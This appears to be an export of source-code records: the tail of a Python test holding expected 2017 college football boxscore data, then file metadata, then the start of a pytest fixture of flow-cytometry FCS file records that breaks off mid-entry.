'winning_abbr': 'louisiana-lafayette',
'losing_name': 'Southeastern Louisiana',
'losing_abbr': 'Southeastern Louisiana'},
{'boxscore': '2017-09-02-louisiana-tech',
'away_name': 'Northwestern State',
'away_abbr': 'Northwestern State',
'away_score': 24,
'away_rank': None,
'home_name': 'Louisiana Tech',
'home_abbr': 'louisiana-tech',
'home_score': 52,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Louisiana Tech',
'winning_abbr': 'louisiana-tech',
'losing_name': 'Northwestern State',
'losing_abbr': 'Northwestern State'},
{'boxscore': '2017-09-02-marshall',
'away_name': 'Miami (OH)',
'away_abbr': 'miami-oh',
'away_score': 26,
'away_rank': None,
'home_name': 'Marshall',
'home_abbr': 'marshall',
'home_score': 31,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Marshall',
'winning_abbr': 'marshall',
'losing_name': 'Miami (OH)',
'losing_abbr': 'miami-oh'},
{'boxscore': '2017-09-02-miami-fl',
'away_name': 'Bethune-Cookman',
'away_abbr': 'Bethune-Cookman',
'away_score': 13,
'away_rank': None,
'home_name': 'Miami (FL)',
'home_abbr': 'miami-fl',
'home_score': 41,
'home_rank': 18,
'non_di': True,
'top_25': True,
'winning_name': 'Miami (FL)',
'winning_abbr': 'miami-fl',
'losing_name': 'Bethune-Cookman',
'losing_abbr': 'Bethune-Cookman'},
{'boxscore': '2017-09-02-michigan',
'away_name': 'Florida',
'away_abbr': 'florida',
'away_score': 17,
'away_rank': 17,
'home_name': 'Michigan',
'home_abbr': 'michigan',
'home_score': 33,
'home_rank': 11,
'non_di': False,
'top_25': True,
'winning_name': 'Michigan',
'winning_abbr': 'michigan',
'losing_name': 'Florida',
'losing_abbr': 'florida'},
{'boxscore': '2017-09-02-michigan-state',
'away_name': 'Bowling Green State',
'away_abbr': 'bowling-green-state',
'away_score': 10,
'away_rank': None,
'home_name': 'Michigan State',
'home_abbr': 'michigan-state',
'home_score': 35,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Michigan State',
'winning_abbr': 'michigan-state',
'losing_name': 'Bowling Green State',
'losing_abbr': 'bowling-green-state'},
{'boxscore': '2017-09-02-middle-tennessee-state',
'away_name': 'Vanderbilt',
'away_abbr': 'vanderbilt',
'away_score': 28,
'away_rank': None,
'home_name': 'Middle Tennessee State',
'home_abbr': 'middle-tennessee-state',
'home_score': 6,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Vanderbilt',
'winning_abbr': 'vanderbilt',
'losing_name': 'Middle Tennessee State',
'losing_abbr': 'middle-tennessee-state'},
{'boxscore': '2017-09-02-mississippi',
'away_name': 'South Alabama',
'away_abbr': 'south-alabama',
'away_score': 27,
'away_rank': None,
'home_name': 'Ole Miss',
'home_abbr': 'mississippi',
'home_score': 47,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Ole Miss',
'winning_abbr': 'mississippi',
'losing_name': 'South Alabama',
'losing_abbr': 'south-alabama'},
{'boxscore': '2017-09-02-mississippi-state',
'away_name': 'Charleston Southern',
'away_abbr': 'Charleston Southern',
'away_score': 0,
'away_rank': None,
'home_name': 'Mississippi State',
'home_abbr': 'mississippi-state',
'home_score': 49,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': None,
'winning_abbr': None,
'losing_name': None,
'losing_abbr': None},
{'boxscore': '2017-09-02-missouri',
'away_name': 'Missouri State',
'away_abbr': 'Missouri State',
'away_score': 43,
'away_rank': None,
'home_name': 'Missouri',
'home_abbr': 'missouri',
'home_score': 72,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Missouri',
'winning_abbr': 'missouri',
'losing_name': 'Missouri State',
'losing_abbr': 'Missouri State'},
{'boxscore': '2017-09-02-nebraska',
'away_name': 'Arkansas State',
'away_abbr': 'arkansas-state',
'away_score': 36,
'away_rank': None,
'home_name': 'Nebraska',
'home_abbr': 'nebraska',
'home_score': 43,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Nebraska',
'winning_abbr': 'nebraska',
'losing_name': 'Arkansas State',
'losing_abbr': 'arkansas-state'},
{'boxscore': '2017-09-02-nevada-las-vegas',
'away_name': 'Howard',
'away_abbr': 'Howard',
'away_score': 43,
'away_rank': None,
'home_name': 'UNLV',
'home_abbr': 'nevada-las-vegas',
'home_score': 40,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Howard',
'winning_abbr': 'Howard',
'losing_name': 'UNLV',
'losing_abbr': 'nevada-las-vegas'},
{'boxscore': '2017-09-02-new-mexico',
'away_name': 'Abilene Christian',
'away_abbr': 'Abilene Christian',
'away_score': 14,
'away_rank': None,
'home_name': 'New Mexico',
'home_abbr': 'new-mexico',
'home_score': 38,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'New Mexico',
'winning_abbr': 'new-mexico',
'losing_name': 'Abilene Christian',
'losing_abbr': 'Abilene Christian'},
{'boxscore': '2017-09-02-north-carolina',
'away_name': 'California',
'away_abbr': 'california',
'away_score': 35,
'away_rank': None,
'home_name': 'North Carolina',
'home_abbr': 'north-carolina',
'home_score': 30,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'California',
'winning_abbr': 'california',
'losing_name': 'North Carolina',
'losing_abbr': 'north-carolina'},
{'boxscore': '2017-09-02-north-carolina-state',
'away_name': 'South Carolina',
'away_abbr': 'south-carolina',
'away_score': 35,
'away_rank': None,
'home_name': 'North Carolina State',
'home_abbr': 'north-carolina-state',
'home_score': 28,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'South Carolina',
'winning_abbr': 'south-carolina',
'losing_name': 'North Carolina State',
'losing_abbr': 'north-carolina-state'},
{'boxscore': '2017-09-02-north-texas',
'away_name': 'Lamar',
'away_abbr': 'Lamar',
'away_score': 14,
'away_rank': None,
'home_name': 'North Texas',
'home_abbr': 'north-texas',
'home_score': 59,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'North Texas',
'winning_abbr': 'north-texas',
'losing_name': 'Lamar',
'losing_abbr': 'Lamar'},
{'boxscore': '2017-09-02-northwestern',
'away_name': 'Nevada',
'away_abbr': 'nevada',
'away_score': 20,
'away_rank': None,
'home_name': 'Northwestern',
'home_abbr': 'northwestern',
'home_score': 31,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Northwestern',
'winning_abbr': 'northwestern',
'losing_name': 'Nevada',
'losing_abbr': 'nevada'},
{'boxscore': '2017-09-02-notre-dame',
'away_name': 'Temple',
'away_abbr': 'temple',
'away_score': 16,
'away_rank': None,
'home_name': 'Notre Dame',
'home_abbr': 'notre-dame',
'home_score': 49,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Notre Dame',
'winning_abbr': 'notre-dame',
'losing_name': 'Temple',
'losing_abbr': 'temple'},
{'boxscore': '2017-09-02-ohio',
'away_name': 'Hampton',
'away_abbr': 'Hampton',
'away_score': 0,
'away_rank': None,
'home_name': 'Ohio',
'home_abbr': 'ohio',
'home_score': 59,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': None,
'winning_abbr': None,
'losing_name': None,
'losing_abbr': None},
{'boxscore': '2017-09-02-oklahoma',
'away_name': 'UTEP',
'away_abbr': 'texas-el-paso',
'away_score': 7,
'away_rank': None,
'home_name': 'Oklahoma',
'home_abbr': 'oklahoma',
'home_score': 56,
'home_rank': 7,
'non_di': False,
'top_25': True,
'winning_name': 'Oklahoma',
'winning_abbr': 'oklahoma',
'losing_name': 'UTEP',
'losing_abbr': 'texas-el-paso'},
{'boxscore': '2017-09-02-old-dominion',
'away_name': 'Albany',
'away_abbr': 'Albany',
'away_score': 17,
'away_rank': None,
'home_name': 'Old Dominion',
'home_abbr': 'old-dominion',
'home_score': 31,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Old Dominion',
'winning_abbr': 'old-dominion',
'losing_name': 'Albany',
'losing_abbr': 'Albany'},
{'boxscore': '2017-09-02-oregon',
'away_name': 'Southern Utah',
'away_abbr': 'Southern Utah',
'away_score': 21,
'away_rank': None,
'home_name': 'Oregon',
'home_abbr': 'oregon',
'home_score': 77,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Oregon',
'winning_abbr': 'oregon',
'losing_name': 'Southern Utah',
'losing_abbr': 'Southern Utah'},
{'boxscore': '2017-09-02-oregon-state',
'away_name': 'Portland State',
'away_abbr': 'Portland State',
'away_score': 32,
'away_rank': None,
'home_name': 'Oregon State',
'home_abbr': 'oregon-state',
'home_score': 35,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Oregon State',
'winning_abbr': 'oregon-state',
'losing_name': 'Portland State',
'losing_abbr': 'Portland State'},
{'boxscore': '2017-09-02-penn-state',
'away_name': 'Akron',
'away_abbr': 'akron',
'away_score': 0,
'away_rank': None,
'home_name': 'Penn State',
'home_abbr': 'penn-state',
'home_score': 52,
'home_rank': 6,
'non_di': False,
'top_25': True,
'winning_name': None,
'winning_abbr': None,
'losing_name': None,
'losing_abbr': None},
{'boxscore': '2017-09-02-pittsburgh',
'away_name': 'Youngstown State',
'away_abbr': 'Youngstown State',
'away_score': 21,
'away_rank': None,
'home_name': 'Pitt',
'home_abbr': 'pittsburgh',
'home_score': 28,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Pitt',
'winning_abbr': 'pittsburgh',
'losing_name': 'Youngstown State',
'losing_abbr': 'Youngstown State'},
{'boxscore': '2017-09-02-purdue',
'away_name': 'Louisville',
'away_abbr': 'louisville',
'away_score': 35,
'away_rank': 16,
'home_name': 'Purdue',
'home_abbr': 'purdue',
'home_score': 28,
'home_rank': None,
'non_di': False,
'top_25': True,
'winning_name': 'Louisville',
'winning_abbr': 'louisville',
'losing_name': 'Purdue',
'losing_abbr': 'purdue'},
{'boxscore': '2017-09-02-san-diego-state',
'away_name': 'California-Davis',
'away_abbr': 'California-Davis',
'away_score': 17,
'away_rank': None,
'home_name': 'San Diego State',
'home_abbr': 'san-diego-state',
'home_score': 38,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'San Diego State',
'winning_abbr': 'san-diego-state',
'losing_name': 'California-Davis',
'losing_abbr': 'California-Davis'},
{'boxscore': '2017-09-02-san-jose-state',
'away_name': 'Cal Poly',
'away_abbr': 'Cal Poly',
'away_score': 13,
'away_rank': None,
'home_name': 'San Jose State',
'home_abbr': 'san-jose-state',
'home_score': 34,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'San Jose State',
'winning_abbr': 'san-jose-state',
'losing_name': 'Cal Poly',
'losing_abbr': 'Cal Poly'},
{'boxscore': '2017-09-02-south-florida',
'away_name': 'Stony Brook',
'away_abbr': 'Stony Brook',
'away_score': 17,
'away_rank': None,
'home_name': 'South Florida',
'home_abbr': 'south-florida',
'home_score': 31,
'home_rank': 19,
'non_di': True,
'top_25': True,
'winning_name': 'South Florida',
'winning_abbr': 'south-florida',
'losing_name': 'Stony Brook',
'losing_abbr': 'Stony Brook'},
{'boxscore': '2017-09-02-southern-california',
'away_name': 'Western Michigan',
'away_abbr': 'western-michigan',
'away_score': 31,
'away_rank': None,
'home_name': 'USC',
'home_abbr': 'southern-california',
'home_score': 49,
'home_rank': 4,
'non_di': False,
'top_25': True,
'winning_name': 'USC',
'winning_abbr': 'southern-california',
'losing_name': 'Western Michigan',
'losing_abbr': 'western-michigan'},
{'boxscore': '2017-09-02-southern-methodist',
'away_name': 'Stephen F. Austin',
'away_abbr': 'Stephen F. Austin',
'away_score': 14,
'away_rank': None,
'home_name': 'SMU',
'home_abbr': 'southern-methodist',
'home_score': 58,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'SMU',
'winning_abbr': 'southern-methodist',
'losing_name': 'Stephen F. Austin',
'losing_abbr': 'Stephen F. Austin'},
{'boxscore': '2017-09-02-southern-mississippi',
'away_name': 'Kentucky',
'away_abbr': 'kentucky',
'away_score': 24,
'away_rank': None,
'home_name': 'Southern Mississippi',
'home_abbr': 'southern-mississippi',
'home_score': 17,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Kentucky',
'winning_abbr': 'kentucky',
'losing_name': 'Southern Mississippi',
'losing_abbr': 'southern-mississippi'},
{'boxscore': '2017-09-02-texas',
'away_name': 'Maryland',
'away_abbr': 'maryland',
'away_score': 51,
'away_rank': None,
'home_name': 'Texas',
'home_abbr': 'texas',
'home_score': 41,
'home_rank': 23,
'non_di': False,
'top_25': True,
'winning_name': 'Maryland',
'winning_abbr': 'maryland',
'losing_name': 'Texas',
'losing_abbr': 'texas'},
{'boxscore': '2017-09-02-texas-christian',
'away_name': 'Jackson State',
'away_abbr': 'Jackson State',
'away_score': 0,
'away_rank': None,
'home_name': 'Texas Christian',
'home_abbr': 'texas-christian',
'home_score': 63,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': None,
'winning_abbr': None,
'losing_name': None,
'losing_abbr': None},
{'boxscore': '2017-09-02-texas-state',
'away_name': '',
'away_abbr': '',
'away_score': 11,
'away_rank': None,
'home_name': 'Texas State',
'home_abbr': 'texas-state',
'home_score': 20,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Texas State',
'winning_abbr': 'texas-state',
'losing_name': '',
'losing_abbr': ''},
{'boxscore': '2017-09-02-texas-tech',
'away_name': 'Eastern Washington',
'away_abbr': 'Eastern Washington',
'away_score': 10,
'away_rank': None,
'home_name': 'Texas Tech',
'home_abbr': 'texas-tech',
'home_score': 56,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Texas Tech',
'winning_abbr': 'texas-tech',
'losing_name': 'Eastern Washington',
'losing_abbr': 'Eastern Washington'},
{'boxscore': '2017-09-02-tulane',
'away_name': 'Grambling State',
'away_abbr': 'Grambling State',
'away_score': 14,
'away_rank': None,
'home_name': 'Tulane',
'home_abbr': 'tulane',
'home_score': 43,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Tulane',
'winning_abbr': 'tulane',
'losing_name': 'Grambling State',
'losing_abbr': 'Grambling State'},
{'boxscore': '2017-09-02-virginia',
'away_name': 'William & Mary',
'away_abbr': 'William & Mary',
'away_score': 10,
'away_rank': None,
'home_name': 'Virginia',
'home_abbr': 'virginia',
'home_score': 28,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Virginia',
'winning_abbr': 'virginia',
'losing_name': 'William & Mary',
'losing_abbr': 'William & Mary'},
{'boxscore': '2017-09-02-washington-state',
'away_name': 'Montana State',
'away_abbr': 'Montana State',
'away_score': 0,
'away_rank': None,
'home_name': 'Washington State',
'home_abbr': 'washington-state',
'home_score': 31,
'home_rank': 24,
'non_di': True,
'top_25': True,
'winning_name': None,
'winning_abbr': None,
'losing_name': None,
'losing_abbr': None},
{'boxscore': '2017-09-02-western-kentucky',
'away_name': 'Eastern Kentucky',
'away_abbr': 'Eastern Kentucky',
'away_score': 17,
'away_rank': None,
'home_name': 'Western Kentucky',
'home_abbr': 'western-kentucky',
'home_score': 31,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Western Kentucky',
'winning_abbr': 'western-kentucky',
'losing_name': 'Eastern Kentucky',
'losing_abbr': 'Eastern Kentucky'},
{'boxscore': '2017-09-01-army',
'away_name': 'Fordham',
'away_abbr': 'Fordham',
'away_score': 6,
'away_rank': None,
'home_name': 'Army',
'home_abbr': 'army',
'home_score': 64,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Army',
'winning_abbr': 'army',
'losing_name': 'Fordham',
'losing_abbr': 'Fordham'},
{'boxscore': '2017-09-01-colorado',
'away_name': 'Colorado State',
'away_abbr': 'colorado-state',
'away_score': 3,
'away_rank': None,
'home_name': 'Colorado',
'home_abbr': 'colorado',
'home_score': 17,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Colorado',
'winning_abbr': 'colorado',
'losing_name': 'Colorado State',
'losing_abbr': 'colorado-state'},
{'boxscore': '2017-09-01-eastern-michigan',
'away_name': 'Charlotte',
'away_abbr': 'charlotte',
'away_score': 7,
'away_rank': None,
'home_name': 'Eastern Michigan',
'home_abbr': 'eastern-michigan',
'home_score': 24,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Eastern Michigan',
'winning_abbr': 'eastern-michigan',
'losing_name': 'Charlotte',
'losing_abbr': 'charlotte'},
{'boxscore': '2017-09-01-florida-atlantic',
'away_name': 'Navy',
'away_abbr': 'navy',
'away_score': 42,
'away_rank': None,
'home_name': 'Florida Atlantic',
'home_abbr': 'florida-atlantic',
'home_score': 19,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Navy',
'winning_abbr': 'navy',
'losing_name': 'Florida Atlantic',
'losing_abbr': 'florida-atlantic'},
{'boxscore': '2017-09-01-northern-illinois',
'away_name': 'Boston College',
'away_abbr': 'boston-college',
'away_score': 23,
'away_rank': None,
'home_name': 'Northern Illinois',
'home_abbr': 'northern-illinois',
'home_score': 20,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Boston College',
'winning_abbr': 'boston-college',
'losing_name': 'Northern Illinois',
'losing_abbr': 'northern-illinois'},
{'boxscore': '2017-09-01-rutgers',
'away_name': 'Washington',
'away_abbr': 'washington',
'away_score': 30,
'away_rank': 8,
'home_name': 'Rutgers',
'home_abbr': 'rutgers',
'home_score': 14,
'home_rank': None,
'non_di': False,
'top_25': True,
'winning_name': 'Washington',
'winning_abbr': 'washington',
'losing_name': 'Rutgers',
'losing_abbr': 'rutgers'},
{'boxscore': '2017-09-01-syracuse',
'away_name': 'Central Connecticut State',
'away_abbr': 'Central Connecticut State',
'away_score': 7,
'away_rank': None,
'home_name': 'Syracuse',
'home_abbr': 'syracuse',
'home_score': 50,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Syracuse',
'winning_abbr': 'syracuse',
'losing_name': 'Central Connecticut State',
'losing_abbr': 'Central Connecticut State'},
{'boxscore': '2017-09-01-wisconsin',
'away_name': 'Utah State',
'away_abbr': 'utah-state',
'away_score': 10,
'away_rank': None,
'home_name': 'Wisconsin',
'home_abbr': 'wisconsin',
'home_score': 59,
'home_rank': 9,
'non_di': False,
'top_25': True,
'winning_name': 'Wisconsin',
'winning_abbr': 'wisconsin',
'losing_name': 'Utah State',
'losing_abbr': 'utah-state'}
]
}
result = Boxscores(datetime(2017, 8, 30), datetime(2017, 8, 31)).games
assert result == expected
| 41.759475
| 78
| 0.417889
| 14,189
| 168,583
| 4.70019
| 0.029812
| 0.053261
| 0.042105
| 0.05614
| 0.950668
| 0.949708
| 0.948269
| 0.944385
| 0.940967
| 0.938148
| 0
| 0.041212
| 0.448734
| 168,583
| 4,036
| 79
| 41.769822
| 0.676405
| 0.002135
| 0
| 0.956239
| 0
| 0
| 0.384321
| 0.024587
| 0
| 0
| 0
| 0
| 0.002501
| 1
| 0.003251
| false
| 0.002001
| 0.002251
| 0
| 0.007502
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0a4eb8710f2a84eb8f0f17b69c1f616fe32993c9
| 30,669
|
py
|
Python
|
tests/fixtures/api-fcsfiles.py
|
primitybio/cellengine-python-toolk
|
1f9dd168f1f27e2beba69f02e340371190857b33
|
[
"MIT"
] | 4
|
2021-01-12T17:03:37.000Z
|
2021-12-16T13:23:57.000Z
|
tests/fixtures/api-fcsfiles.py
|
primitybio/cellengine-python-toolk
|
1f9dd168f1f27e2beba69f02e340371190857b33
|
[
"MIT"
] | 61
|
2021-01-11T05:27:16.000Z
|
2022-03-08T01:50:09.000Z
|
tests/fixtures/api-fcsfiles.py
|
primitybio/cellengine-python-toolkit
|
1f9dd168f1f27e2beba69f02e340371190857b33
|
[
"MIT"
] | null | null | null |
import pytest
@pytest.fixture(scope="session")
def fcs_files():
fcs_files = [
{
"_id": "5d64abe2ca9df61349ed8e79",
"annotations": [
{"name": "plate", "value": "96 Well - V bottom"},
{"name": "plate row", "value": "A"},
{"name": "plate column", "value": "12"},
{"name": "plate well", "value": "A12"},
],
"crc32c": "11dc920c",
"deleted": False,
"eventCount": 898,
"experimentId": "5d38a6f79fae87499999a74b",
"filename": "Specimen_001_A12_A12.fcs",
"hasFileInternalComp": True,
"md5": "78df4458fa00a0a2621ce51331fb5fbc",
"isControl": False,
"panel": [
{"channel": "FSC-A", "index": 1, "reagent": None},
{"channel": "FSC-H", "index": 2, "reagent": None},
{"channel": "FSC-W", "index": 3, "reagent": None},
{"channel": "SSC-A", "index": 4, "reagent": None},
{"channel": "SSC-H", "index": 5, "reagent": None},
{"channel": "SSC-W", "index": 6, "reagent": None},
{"channel": "Blue530-A", "index": 7, "reagent": None},
{"channel": "Blue695-A", "index": 8, "reagent": None},
{"channel": "Vio450-A", "index": 9, "reagent": None},
{"channel": "Vio525-A", "index": 10, "reagent": None},
{"channel": "Vio585-A", "index": 11, "reagent": None},
{"channel": "Vio605-A", "index": 12, "reagent": None},
{"channel": "Vio655-A", "index": 13, "reagent": None},
{"channel": "Vio710-A", "index": 14, "reagent": None},
{"channel": "UV450-A", "index": 15, "reagent": None},
{"channel": "UV530-A", "index": 16, "reagent": None},
{"channel": "Red670-A", "index": 17, "reagent": None},
{"channel": "Red730-A", "index": 18, "reagent": None},
{"channel": "Red780-A", "index": 19, "reagent": None},
{"channel": "YG582-A", "index": 20, "reagent": None},
{"channel": "YG610-A", "index": 21, "reagent": None},
{"channel": "YG670-A", "index": 22, "reagent": None},
{"channel": "YG710-A", "index": 23, "reagent": None},
{"channel": "YG780-A", "index": 24, "reagent": None},
{"channel": "Time", "index": 25, "reagent": None},
],
"panelName": "Panel 1",
"sampleName": " ",
"size": 94438,
},
{
"_id": "5d64abe2ca9df61349ed8e7a",
"annotations": [
{"name": "plate", "value": "96 Well - V bottom"},
{"name": "plate row", "value": "A"},
{"name": "plate column", "value": "02"},
{"name": "plate well", "value": "A02"},
],
"crc32c": "11dc920c",
"deleted": False,
"eventCount": 1025,
"experimentId": "5d38a6f79fae87499999a74b",
"filename": "Specimen_001_A2_A02.fcs",
"hasFileInternalComp": True,
"md5": "4a0ddcc46265709d2bc0786ccc52e9a0",
"isControl": False,
"panel": [
{"channel": "FSC-A", "index": 1, "reagent": None},
{"channel": "FSC-H", "index": 2, "reagent": None},
{"channel": "FSC-W", "index": 3, "reagent": None},
{"channel": "SSC-A", "index": 4, "reagent": None},
{"channel": "SSC-H", "index": 5, "reagent": None},
{"channel": "SSC-W", "index": 6, "reagent": None},
{"channel": "Blue530-A", "index": 7, "reagent": None},
{"channel": "Blue695-A", "index": 8, "reagent": None},
{"channel": "Vio450-A", "index": 9, "reagent": None},
{"channel": "Vio525-A", "index": 10, "reagent": None},
{"channel": "Vio585-A", "index": 11, "reagent": None},
{"channel": "Vio605-A", "index": 12, "reagent": None},
{"channel": "Vio655-A", "index": 13, "reagent": None},
{"channel": "Vio710-A", "index": 14, "reagent": None},
{"channel": "UV450-A", "index": 15, "reagent": None},
{"channel": "UV530-A", "index": 16, "reagent": None},
{"channel": "Red670-A", "index": 17, "reagent": None},
{"channel": "Red730-A", "index": 18, "reagent": None},
{"channel": "Red780-A", "index": 19, "reagent": None},
{"channel": "YG582-A", "index": 20, "reagent": None},
{"channel": "YG610-A", "index": 21, "reagent": None},
{"channel": "YG670-A", "index": 22, "reagent": None},
{"channel": "YG710-A", "index": 23, "reagent": None},
{"channel": "YG780-A", "index": 24, "reagent": None},
{"channel": "Time", "index": 25, "reagent": None},
],
"panelName": "Panel 1",
"sampleName": " ",
"size": 107131,
},
{
"_id": "5d64abe2ca9df61349ed8e7b",
"annotations": [
{"name": "plate", "value": "96 Well - V bottom"},
{"name": "plate row", "value": "A"},
{"name": "plate column", "value": "05"},
{"name": "plate well", "value": "A05"},
],
"crc32c": "11dc920c",
"deleted": False,
"eventCount": 1490,
"experimentId": "5d38a6f79fae87499999a74b",
"filename": "Specimen_001_A5_A05.fcs",
"hasFileInternalComp": True,
"md5": "754cd2970e059ad7f391b007588feb90",
"isControl": False,
"panel": [
{"channel": "FSC-A", "index": 1, "reagent": None},
{"channel": "FSC-H", "index": 2, "reagent": None},
{"channel": "FSC-W", "index": 3, "reagent": None},
{"channel": "SSC-A", "index": 4, "reagent": None},
{"channel": "SSC-H", "index": 5, "reagent": None},
{"channel": "SSC-W", "index": 6, "reagent": None},
{"channel": "Blue530-A", "index": 7, "reagent": None},
{"channel": "Blue695-A", "index": 8, "reagent": None},
{"channel": "Vio450-A", "index": 9, "reagent": None},
{"channel": "Vio525-A", "index": 10, "reagent": None},
{"channel": "Vio585-A", "index": 11, "reagent": None},
{"channel": "Vio605-A", "index": 12, "reagent": None},
{"channel": "Vio655-A", "index": 13, "reagent": None},
{"channel": "Vio710-A", "index": 14, "reagent": None},
{"channel": "UV450-A", "index": 15, "reagent": None},
{"channel": "UV530-A", "index": 16, "reagent": None},
{"channel": "Red670-A", "index": 17, "reagent": None},
{"channel": "Red730-A", "index": 18, "reagent": None},
{"channel": "Red780-A", "index": 19, "reagent": None},
{"channel": "YG582-A", "index": 20, "reagent": None},
{"channel": "YG610-A", "index": 21, "reagent": None},
{"channel": "YG670-A", "index": 22, "reagent": None},
{"channel": "YG710-A", "index": 23, "reagent": None},
{"channel": "YG780-A", "index": 24, "reagent": None},
{"channel": "Time", "index": 25, "reagent": None},
],
"panelName": "Panel 1",
"sampleName": " ",
"size": 153630,
},
{
"_id": "5d64abe2ca9df61349ed8e7c",
"annotations": [
{"name": "plate", "value": "96 Well - V bottom"},
{"name": "plate row", "value": "A"},
{"name": "plate column", "value": "01"},
{"name": "plate well", "value": "A01"},
],
"crc32c": "11dc920c",
"deleted": False,
"eventCount": 415,
"experimentId": "5d38a6f79fae87499999a74b",
"filename": "Specimen_001_A1_A01.fcs",
"hasFileInternalComp": True,
"md5": "44b7add508fdfa816c57f8fc9d61f759",
"isControl": False,
"panel": [
{"channel": "FSC-A", "index": 1, "reagent": None},
{"channel": "FSC-H", "index": 2, "reagent": None},
{"channel": "FSC-W", "index": 3, "reagent": None},
{"channel": "SSC-A", "index": 4, "reagent": None},
{"channel": "SSC-H", "index": 5, "reagent": None},
{"channel": "SSC-W", "index": 6, "reagent": None},
{"channel": "Blue530-A", "index": 7, "reagent": None},
{"channel": "Blue695-A", "index": 8, "reagent": None},
{"channel": "Vio450-A", "index": 9, "reagent": None},
{"channel": "Vio525-A", "index": 10, "reagent": None},
{"channel": "Vio585-A", "index": 11, "reagent": None},
{"channel": "Vio605-A", "index": 12, "reagent": None},
{"channel": "Vio655-A", "index": 13, "reagent": None},
{"channel": "Vio710-A", "index": 14, "reagent": None},
{"channel": "UV450-A", "index": 15, "reagent": None},
{"channel": "UV530-A", "index": 16, "reagent": None},
{"channel": "Red670-A", "index": 17, "reagent": None},
{"channel": "Red730-A", "index": 18, "reagent": None},
{"channel": "Red780-A", "index": 19, "reagent": None},
{"channel": "YG582-A", "index": 20, "reagent": None},
{"channel": "YG610-A", "index": 21, "reagent": None},
{"channel": "YG670-A", "index": 22, "reagent": None},
{"channel": "YG710-A", "index": 23, "reagent": None},
{"channel": "YG780-A", "index": 24, "reagent": None},
{"channel": "Time", "index": 25, "reagent": None},
],
"panelName": "Panel 1",
"sampleName": " ",
"size": 46131,
},
{
"_id": "5d64abe2ca9df61349ed8e7d",
"annotations": [
{"name": "plate", "value": "96 Well - V bottom"},
{"name": "plate row", "value": "A"},
{"name": "plate column", "value": "03"},
{"name": "plate well", "value": "A03"},
],
"crc32c": "11dc920c",
"deleted": False,
"eventCount": 993,
"experimentId": "5d38a6f79fae87499999a74b",
"filename": "Specimen_001_A3_A03.fcs",
"hasFileInternalComp": True,
"md5": "7e139fa7cb350deb6f1f180a6290b87f",
"isControl": False,
"panel": [
{"channel": "FSC-A", "index": 1, "reagent": None},
{"channel": "FSC-H", "index": 2, "reagent": None},
{"channel": "FSC-W", "index": 3, "reagent": None},
{"channel": "SSC-A", "index": 4, "reagent": None},
{"channel": "SSC-H", "index": 5, "reagent": None},
{"channel": "SSC-W", "index": 6, "reagent": None},
{"channel": "Blue530-A", "index": 7, "reagent": None},
{"channel": "Blue695-A", "index": 8, "reagent": None},
{"channel": "Vio450-A", "index": 9, "reagent": None},
{"channel": "Vio525-A", "index": 10, "reagent": None},
{"channel": "Vio585-A", "index": 11, "reagent": None},
{"channel": "Vio605-A", "index": 12, "reagent": None},
{"channel": "Vio655-A", "index": 13, "reagent": None},
{"channel": "Vio710-A", "index": 14, "reagent": None},
{"channel": "UV450-A", "index": 15, "reagent": None},
{"channel": "UV530-A", "index": 16, "reagent": None},
{"channel": "Red670-A", "index": 17, "reagent": None},
{"channel": "Red730-A", "index": 18, "reagent": None},
{"channel": "Red780-A", "index": 19, "reagent": None},
{"channel": "YG582-A", "index": 20, "reagent": None},
{"channel": "YG610-A", "index": 21, "reagent": None},
{"channel": "YG670-A", "index": 22, "reagent": None},
{"channel": "YG710-A", "index": 23, "reagent": None},
{"channel": "YG780-A", "index": 24, "reagent": None},
{"channel": "Time", "index": 25, "reagent": None},
],
"panelName": "Panel 1",
"sampleName": " ",
"size": 103931,
},
{
"_id": "5d64abe2ca9df61349ed8e7e",
"annotations": [
{"name": "plate", "value": "96 Well - V bottom"},
{"name": "plate row", "value": "A"},
{"name": "plate column", "value": "04"},
{"name": "plate well", "value": "A04"},
],
"crc32c": "11dc920c",
"deleted": False,
"eventCount": 936,
